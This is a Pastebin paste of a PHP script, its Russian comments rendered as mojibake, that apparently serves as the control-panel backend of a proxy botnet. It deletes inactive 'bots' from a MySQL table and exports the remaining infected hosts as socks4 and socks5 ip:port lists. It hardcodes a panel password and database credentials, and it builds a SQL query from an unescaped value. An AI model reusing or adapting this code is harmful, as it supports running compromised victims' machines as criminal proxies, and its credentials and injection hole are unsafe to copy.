SHARE
TWEET

Untitled

a guest Jun 7th, 2017 70 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
 1. ?php
 2.  
 3. //////////////////////////
 4. /*
 5. Ýòîò ñêðèïò
 6. 1) Îáíîâèò áàçó, óäàëèò äîõëûõ áîòîâ
 7. 2) Çàïèøåò ñïèñîê (îñòàâøèéñÿ) socks4 â ôàéë
 8. 3) Çàïèøåò ñïèñîê (îñòàâøèéñÿ) socks5 â ôàéë
 9. //////////////////////////
 10. */
 11.  
 12. /* ôàéëû äëÿ ñîõðàíåíèÿ ñïèñêà ñîêñ4/5 */
 13. $socks4file = "socks4.fresh.txt";
 14. $socks5file = "socks5.fresh.txt";
 15.  
 16. /* ïàðîëü äîñòóïà ê àäìèíêå */
 17. $password = "qwerty";
 18.  
 19. /* MySQL */
 20. $mysql_host = "ftp.drivehq.com";
 21. $mysql_user = "hacker0007";
 22. $mysql_password = "qwerty";
 23.  
 24. /* èìÿ ÁÄ */
 25. $mysql_dbname = "test";
 26.  
 27. /* èìÿ òàáëèöû */
 28. $mysql_bots_table = "bots";
 29.  
 30. /* âðåìÿ óäàëåíèå íåàêòèâíûì áîòîâ.. ñòàâüòå ÷óòü áîëüøå ÷åì â áîòå */
 31. $refreshtime = 15;
 32.  
 33. /* updates DB */
 34. function db_update()
 35. {
 36.     GLOBAL $mysql_host, $mysql_user, $mysql_password, $mysql_dbname, $mysql_bots_table, $refreshtime;
 37.     if (!@mysql_connect( $mysql_host, $mysql_user, $mysql_password ))
 38.         return "Cannot connect to database";        
 39.     mysql_select_db( $mysql_dbname );
 40.    
 41.     $r = mysql_query( "SELECT time, nickname FROM $mysql_bots_table" );
 42.     while ($r && $arr = mysql_fetch_array( $r ))
 43.     {
 44.         $time = $arr["time"];
 45.         $nickname = $arr["nickname"];
 46.         if (time() - $time > $refreshtime)
 47.             mysql_query( "DELETE FROM $mysql_bots_table WHERE nickname=\"$nickname\"" );
 48.     }
 49.  
 50.     mysql_close();
 51.     return "OK";
 52. }
 53.  
 54. function db_savesocks4()
 55. {
 56.     GLOBAL $mysql_host, $mysql_user, $mysql_password, $mysql_dbname, $mysql_bots_table, $refreshtime, $socks4file;
 57.  
 58.     if (!@mysql_connect( $mysql_host, $mysql_user, $mysql_password ))
 59.         return "Cannot connect to database";        
 60.     mysql_select_db( $mysql_dbname );
 61.  
 62.     $f = fopen( $socks4file, "w" );
 63.  
 64.     $r = mysql_query( "SELECT ip,socks4 FROM $mysql_bots_table WHERE socks4" );
 65.     $i = 0;
 66.     while ($r && $arr = mysql_fetch_array( $r ))
 67.     {
 68.         $s4 = $arr["socks4"];
 69.         $ip = $arr["ip"];
 70.         fwrite( $f, "$ip:$s4\r\n" );
 71.         $i++;
 72.     }    
 73.  
 74.     fclose( $f );
 75.     mysql_close();
 76.     return $i;
 77. }
 78.  
 79. function db_savesocks5()
 80. {
 81.     GLOBAL $mysql_host, $mysql_user, $mysql_password, $mysql_dbname, $mysql_bots_table, $refreshtime, $socks5file;
 82.  
 83.     if (!@mysql_connect( $mysql_host, $mysql_user, $mysql_password ))
 84.         return "Cannot connect to database";        
 85.     mysql_select_db( $mysql_dbname );
 86.  
 87.     $f = fopen( $socks5file, "w" );
 88.  
 89.     $r = mysql_query( "SELECT ip,socks5 FROM $mysql_bots_table WHERE socks5" );
 90.     $i = 0;
 91.     while ($r && $arr = mysql_fetch_array( $r ))
 92.     {
 93.         $s5 = $arr["socks5"];
 94.         $ip = $arr["ip"];
 95.         fwrite( $f, "$ip:$s5\r\n" );
 96.         $i++;
 97.     }    
 98.  
 99.     fclose( $f );
 100.     mysql_close();
 101.     return $i;
 102. }
 103.  
 104. print "Updating DB...";
 105. print db_update()."\n";
 106. print "Saving $socks4file file...";
 107. print "Saved ".db_savesocks4()." items\n";
 108. print "Saving $socks5file file...";
 109. print "Saved ".db_savesocks5()." items\n";
 110.  
 111. ?>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!
 
Top